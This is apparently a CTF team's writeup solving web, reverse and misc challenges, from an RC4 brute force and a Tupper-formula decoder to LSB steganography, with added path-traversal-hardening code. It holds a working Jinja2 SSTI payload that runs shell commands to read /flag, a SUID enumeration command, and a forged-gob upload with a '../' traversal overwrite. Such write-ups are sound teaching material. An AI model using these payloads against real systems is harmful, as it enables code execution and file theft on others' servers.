1manity’s WriteUp

Just jotted a few notes, not written up very clearly (feeling thoroughly lazy QWQ).


Team name

1manity

Rank

13th

Solutions

WEB

象棋王子 (Chess Prince)

A simple game challenge.


Find the win logic in the page's script and run it from the browser console.


电子木鱼 (Electronic Wooden Fish)

Rust integer overflow.

Cost deducts 10 merit per hit. Multiply that by 1073741824 (2^30) and 10·2^30 no longer fits in an i32 (max 2^31-1), so it overflows and the negative i32 turns into a positive i32. Nothing more to say about it.


BabyGo

gob deserialization + sandbox escape.

Generate the gob file:

package main

import (
    "encoding/gob"
    "fmt"
    "os"
)

// Same field layout as the target's User type, so the server's gob decoder
// accepts the file; Power is set to admin.
type User struct {
    Name  string
    Path  string
    Power string
}

func main() {
    fmt.Println("Hello World")
    userDir := "/tmp/b1a6761e169cd3774fa99ebfc114aa29/"
    info := User{Name: "ctfer", Path: userDir, Power: "admin"}
    name := "user.gob"
    // write the encoded struct to user.gob in the current directory
    File, _ := os.OpenFile(name, os.O_RDWR|os.O_CREATE, 0777)
    defer File.Close()
    enc := gob.NewEncoder(File)
    if err := enc.Encode(info); err != nil {
        fmt.Println(err)
    }
}

Upload the archive, then pass `../` as the path parameter when extracting, so user.gob is written one directory up and overwrites the server's copy.
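The overwrite works because the extraction step joins a user-controlled `path` (and the archive's entry names) onto a base directory without checking where the result lands. The following is an added example, not code from the writeup or the challenge: it builds a constructed zip in memory, shows the vulnerable join with `path='../'` landing the file beside the per-user directory, and a hardened extractor that resolves every destination and refuses anything outside the base. The directory layout under `uploads/` is hypothetical.

```python
import io
import os
import tempfile
import zipfile


def build_upload(entries):
    """Constructed sample archive: {entry name: bytes} -> zip file bytes.

    ZipFile.writestr() stores the name verbatim, so an entry can be called
    '../user.gob' exactly like a malicious upload would be.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def extract_naive(zip_bytes, base_dir, path):
    """Vulnerable pattern: the user-controlled 'path' parameter and the entry
    names are joined onto base_dir and never checked against it."""
    dest = os.path.join(base_dir, path)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.join(dest, name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(name))
            written.append(os.path.realpath(target))
    return written


def inside(base_real, candidate):
    """True when candidate resolves to base_real itself or somewhere below it."""
    candidate_real = os.path.realpath(candidate)
    return os.path.commonpath([base_real, candidate_real]) == base_real


def extract_safe(zip_bytes, base_dir, path):
    """Hardened pattern: resolve every destination and refuse anything that
    leaves base_dir, whether the escape comes from 'path' or from an entry."""
    base_real = os.path.realpath(base_dir)
    dest = os.path.join(base_real, path)
    if not inside(base_real, dest):
        raise ValueError("destination escapes base directory: %r" % path)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # reject absolute names and '..' components before touching disk
            if os.path.isabs(name) or ".." in name.replace("\\", "/").split("/"):
                raise ValueError("suspicious entry name: %r" % name)
            target = os.path.join(dest, name)
            if not inside(base_real, target):
                raise ValueError("entry escapes base directory: %r" % name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(name))
            written.append(os.path.realpath(target))
    return written


def demo():
    """Run both extractors against a constructed upload in a scratch tree.
    The per-user directory name is hypothetical, mirroring the writeup."""
    root = tempfile.mkdtemp()
    user_dir = os.path.join(root, "uploads", "b1a6761e169cd3774fa99ebfc114aa29")
    os.makedirs(user_dir)
    payload = build_upload({"user.gob": b"forged gob bytes"})

    # 1. naive extractor with path='../': user.gob lands one level above user_dir
    escaped = extract_naive(payload, user_dir, "../")
    expected_escape = os.path.realpath(os.path.join(root, "uploads", "user.gob"))

    # 2. hardened extractor refuses the same request
    try:
        extract_safe(payload, user_dir, "../")
        blocked = False
    except ValueError:
        blocked = True

    # 3. hardened extractor still accepts a normal upload into user_dir
    kept = extract_safe(payload, user_dir, "")
    with open(kept[0], "rb") as fh:
        kept_data = fh.read()

    return {
        "escaped_to": escaped[0],
        "expected_escape": expected_escape,
        "blocked": blocked,
        "kept_in_user_dir": kept[0] == os.path.realpath(os.path.join(user_dir, "user.gob")),
        "kept_data": kept_data,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The check is done on `realpath` output rather than on the string, so `a/../b`, trailing slashes and symlinked base directories all resolve before comparison. If the archive format in use can create symlinks, re-check each target after extraction as well, since a link written by an earlier entry can redirect a later one.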

For the Go sandbox escape I found an article that is exactly the same setup:

https://www.ctfiot.com/55141.html


REVERSE

PZGalaxy

Isn't this also web...

Open devtools (F12) to see the key code, then brute-force it; paste it straight into the console and it runs to completion. Leaf is plain RC4 (key scheduling followed by keystream XOR) keyed with an 8-character string starting with "2023", so only the 4-digit suffix has to be searched; the loop runs to 114514, but only i ≤ 9999 yields an 8-character key, so the rest is wasted work.

// RC4: key-scheduling algorithm, then the PRGA keystream XORed with the input
function Leaf(k, p) {
    var s = [], j = 0, x, res = '';
    for (var i = 0; i < 256; i++) {
        s[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + k.charCodeAt(i % k.length)) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
    }
    i = 0;
    j = 0;
    for (var y = 0; y < p.length; y++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
        res += String.fromCharCode(p.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return res;
}

// brute-force the key "2023" + four zero-padded digits until the output starts with "flag"
function f() {
    for (let i = 0; i <= 114514; i++) {
        const str1 = "2023";
        const str2 = i.toString();
        const date = str1 + str2.padStart(4, '0');

        const enc = ['¦', 'p', ':', 'Ü', '\x92', 'Ã', '\x97', 'ó', '\x1A', 'ß', '\b', 'Ö', 'A', ' ', '5', '\x90', '{', '\x06', 'Ô', '÷', 's', '_', '\x1D', ':', 'I', 'L', 'C', 'X', 'Ñ', '¹', 'O', '\x99', '\x85', '3', 'à', 'i', '|'];
        const flag = Leaf(date, enc.join(''));

        if (flag.substring(0, 4) == "flag" && date.length == 8 && date.substring(0, 4) == "2023") {
            console.log(flag);
            break;
        }
    }
}
f();


MISC

验证码 (Captcha)

The hint points at Tupper's self-referential formula: the captcha is a number k whose bits, read through the formula, draw a 106×17 bitmap.
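The screenshot that carried the challenge's k did not survive, so the decoder below is an added example (not the writeup's own script) with an encoder for a constructed round trip. It evaluates the inequality exactly with integer shifts rather than floating point: pixel (x, y) is plotted iff bit 17·x + (y mod 17) of floor(y/17) is set, which is why k is always a multiple of 17. Rows are returned top-down with x increasing to the right, i.e. as the picture sits on a plane with y pointing up; if a decoded k looks mirrored on your terminal, reverse each row.

```python
WIDTH, HEIGHT = 106, 17


def tupper_pixel(x, y):
    """Exact integer evaluation of Tupper's inequality

        1/2 < floor( mod( floor(y/17) * 2^(-17*floor(x) - mod(floor(y), 17)), 2 ) )

    for integer x, y. Multiplying by 2^(-shift) and flooring is the same as
    shifting floor(y/17) right by 'shift' bits, and 'mod 2' keeps the low bit,
    so the point is plotted exactly when that bit is 1."""
    shift = 17 * x + (y % 17)
    return ((y // 17) >> shift) & 1 == 1


def decode(k, width=WIDTH, height=HEIGHT):
    """Plot the region 0 <= x < width, k <= y < k + height.
    Rows come back top-down (largest y first) with x increasing left to
    right, i.e. the picture as it sits on a plane with y pointing up."""
    if k % 17:
        raise ValueError("k must be a multiple of 17")
    rows = []
    for y in range(k + height - 1, k - 1, -1):
        rows.append("".join("#" if tupper_pixel(x, y) else "." for x in range(width)))
    return rows


def encode(rows):
    """Inverse of decode: bitmap rows (top-down, '#' = plotted) -> k.
    Pixel (x, y_from_bottom) lives in bit 17*x + y_from_bottom of k/17,
    which is why k is always a multiple of 17."""
    height = len(rows)
    if height > 17:
        raise ValueError("at most 17 rows fit in one k")
    n = 0
    for x in range(len(rows[0])):
        for y_from_bottom in range(height):
            if rows[height - 1 - y_from_bottom][x] == "#":
                n |= 1 << (17 * x + y_from_bottom)
    return 17 * n


def render(rows):
    return "\n".join(rows)


if __name__ == "__main__":
    # constructed 6x17 sample: a small "L" shape in the lower left corner
    sample = ["......"] * 13 + ["#.....", "#.....", "#.....", "####.."]
    k = encode(sample)
    print(k)
    print(render(decode(k, width=6)))
```

To read a challenge's captcha, call `decode(k)` with the full 106-column width and print `render(...)`; the text is the glyphs drawn in '#'.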


Snake on web

Solved in a few minutes, didn't expect it to be first blood...

import time

import keyboard

# switch focus from the terminal to the browser window running the game
keyboard.press_and_release("alt+tab")
# zig-zag sweep: step down, run left, step down, run right, and repeat;
# the sleeps set how far the snake travels before the next turn
while 1:
    keyboard.press_and_release("s")
    time.sleep(0.1)
    keyboard.press_and_release("a")
    time.sleep(1.8)
    keyboard.press_and_release("s")
    time.sleep(0.1)
    keyboard.press_and_release("d")
    time.sleep(1.8)

It simply sweeps the whole map; play on your phone for a while and the flag shows up.


LSSTIB

A very web-flavoured misc: LSB steganography, then SSTI, then SUID privilege escalation. The challenge itself gives all the hints.

# -*- coding: UTF-8 -*-
from PIL import Image


def getHideString(hide_string):
    # read the file to hide and return its contents as a string of '0'/'1' bits
    with open(hide_string, "rb") as f:
        s = f.read()
    str_bin = ""
    for byte in s:
        str_bin += format(byte, "08b")
    return str_bin


def mod(x, y):
    return x % y


# original_file: carrier image, hide_string: file to hide, new_file: where the stego image is saved
def encode(original_file, hide_string, new_file):
    im = Image.open(original_file)
    # image width and height
    width = im.size[0]
    print("width:" + str(width) + "\n")
    height = im.size[1]
    print("height:" + str(height) + "\n")
    count = 0
    # bits to hide
    key = getHideString(hide_string)
    keylen = len(key)
    for h in range(0, height):
        if count == keylen:
            break
        for w in range(0, width):
            pixel = im.getpixel((w, h))
            R = pixel[0]
            G = pixel[1]
            B = pixel[2]
            if count == keylen:
                break
            # R % 2 is the current least significant bit; subtracting it clears the bit,
            # and adding the next payload bit (0 or 1) writes it in its place
            R = R - mod(R, 2) + int(key[count])
            count += 1
            if count == keylen:
                im.putpixel((w, h), (R, G, B))
                break
            G = G - mod(G, 2) + int(key[count])
            count += 1
            if count == keylen:
                im.putpixel((w, h), (R, G, B))
                break
            B = B - mod(B, 2) + int(key[count])
            count += 1
            if count == keylen:
                im.putpixel((w, h), (R, G, B))
                break
            if count % 3 == 0:
                im.putpixel((w, h), (R, G, B))
    im.save(new_file)


# carrier image
original_file = "Projectile1-export.png"
# output path of the stego image
new_file = "Projectile1-export.png-stego.png"
# file to hide
hide_string = "4.txt"
encode(original_file, hide_string, new_file)
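The script above only embeds; what the challenge actually needs is the reverse. The following is an added example, not from the writeup, that implements both directions over a plain list of (R, G, B) rows so it runs without Pillow (with PIL, feed it `[[im.getpixel((w, h)) for w in range(width)] for h in range(height)]`). The channel order matches the encoder above: R, then G, then B, scanning rows top to bottom. Because that encoder stores no length or terminator, the extractor takes the byte count as a parameter, with a helper that dumps every LSB when the length is unknown. The carrier image and payload are constructed.

```python
def make_image(width, height):
    """Constructed carrier: deterministic pseudo-noise RGB pixels, stored as
    a list of rows of (R, G, B) tuples instead of a PIL image."""
    return [[((w * 37 + h * 91) % 256, (w * 53 + h * 17 + 5) % 256, (w * 11 + h * 71 + 9) % 256)
             for w in range(width)] for h in range(height)]


def bytes_to_bits(data):
    return "".join(format(b, "08b") for b in data)


def bits_to_bytes(bits):
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def lsb_embed(pixels, payload):
    """Write payload bits into the LSB of R, G, B of each pixel, scanning
    rows top to bottom and pixels left to right: the same order as the
    encoder above. Returns a new pixel grid."""
    bits = bytes_to_bits(payload)
    capacity = sum(len(row) for row in pixels) * 3
    if len(bits) > capacity:
        raise ValueError("payload needs %d bits, carrier holds %d" % (len(bits), capacity))
    out = [list(row) for row in pixels]
    i = 0
    for row in out:
        for w, px in enumerate(row):
            if i >= len(bits):
                return out
            chans = list(px)
            for c in range(3):
                if i < len(bits):
                    # clear the low bit, then OR in the next payload bit
                    chans[c] = (chans[c] & 0xFE) | int(bits[i])
                    i += 1
            row[w] = tuple(chans)
    return out


def lsb_extract(pixels, n_bytes):
    """Read n_bytes back in the same channel order. The encoder stores no
    length or terminator, so the caller has to know (or guess) the size."""
    need = n_bytes * 8
    bits = []
    for row in pixels:
        for px in row:
            for c in px[:3]:
                bits.append("1" if c & 1 else "0")
                if len(bits) == need:
                    return bits_to_bytes("".join(bits))
    return bits_to_bytes("".join(bits))


def lsb_extract_all(pixels):
    """Dump every LSB as bytes; useful when the hidden length is unknown and
    you want to look for a recognisable prefix such as 'flag{' by eye."""
    total = sum(len(row) for row in pixels)
    return lsb_extract(pixels, (total * 3) // 8)


def unchanged_above_lsb(a, b):
    """Sanity check: embedding must only ever touch the lowest bit."""
    return all(pa >> 1 == pb >> 1
               for ra, rb in zip(a, b) for pxa, pxb in zip(ra, rb)
               for pa, pb in zip(pxa, pxb))


if __name__ == "__main__":
    carrier = make_image(8, 4)
    stego = lsb_embed(carrier, b"hello")
    print(lsb_extract(stego, 5))
```

On a real carrier, `lsb_extract_all` output past the payload is image noise; cut at the first non-printable run or at a known terminator once you have spotted the prefix.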

Script found online; the SSTI payload is the official one.

SUID privilege escalation: first list SUID binaries, then, since find is among them, use it from the SSTI payload with -exec to read the flag:

find / -perm -u=s -type f 2>/dev/null

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('find lsb.py -exec cat /flag \;').read()")}}
{% endif %}
{% endfor %}
